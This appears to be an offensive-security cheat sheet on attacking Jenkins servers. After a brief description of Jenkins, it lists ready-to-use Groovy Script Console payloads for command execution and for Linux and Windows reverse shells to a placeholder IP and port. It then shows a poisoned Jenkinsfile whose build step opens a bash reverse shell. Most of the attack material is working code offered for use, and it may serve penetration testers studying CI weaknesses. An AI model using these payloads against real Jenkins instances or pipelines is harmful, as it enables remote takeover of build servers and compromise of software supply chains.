Jenkins

CI/CD (Continuous Integration / Continuous Delivery/Deployment) platform.

Jenkins is an open-source automation server written in Java that helps developers build and test their software projects continuously. It is a server-based system that runs in servlet containers such as Tomcat.

Attacks

Jenkins Application

Once we have gained access to a Jenkins application, a quick way of achieving command execution on the underlying server is via the Script Console (/script). The script console allows us to run arbitrary Apache Groovy scripts within the Jenkins controller runtime. Groovy is an object-oriented Java-compatible language. Groovy source code gets compiled into Java Bytecode and can run on any platform that has JRE installed.

WebShell

def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

LinuxRevShell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

WindowsRevShell

String host="<IP>";
int port=<PORT>;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Poisoning the Pipeline

Even though we can modify the jenkinsfile (for example, in a git repository), we need to check how to start the build. Jenkins might be configured to only run on manual intervention; if this is the case, we need to keep exploring. It might also be configured to routinely execute the pipeline. In such a scenario, we won't know how to trigger it until it executes. However, Jenkins might also be configured to run the build on each change to the repo. This is typically done by having the SCM server call a webhook for specific triggers. We can check in the settings whether the repository contains any configurations that will execute a pipeline on certain actions.

pipeline {
  agent any
  stages {
    stage('Build') {
      steps {
        // withAWS(region: 'us-east-1', credentials: 'aws_key') {   // AWS in env
        script {
          if (isUnix()) {
            // <COMMAND_GROOVY>
            sh 'bash -c "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1" & '
          }
        }
        // }
      }
    }
  }
}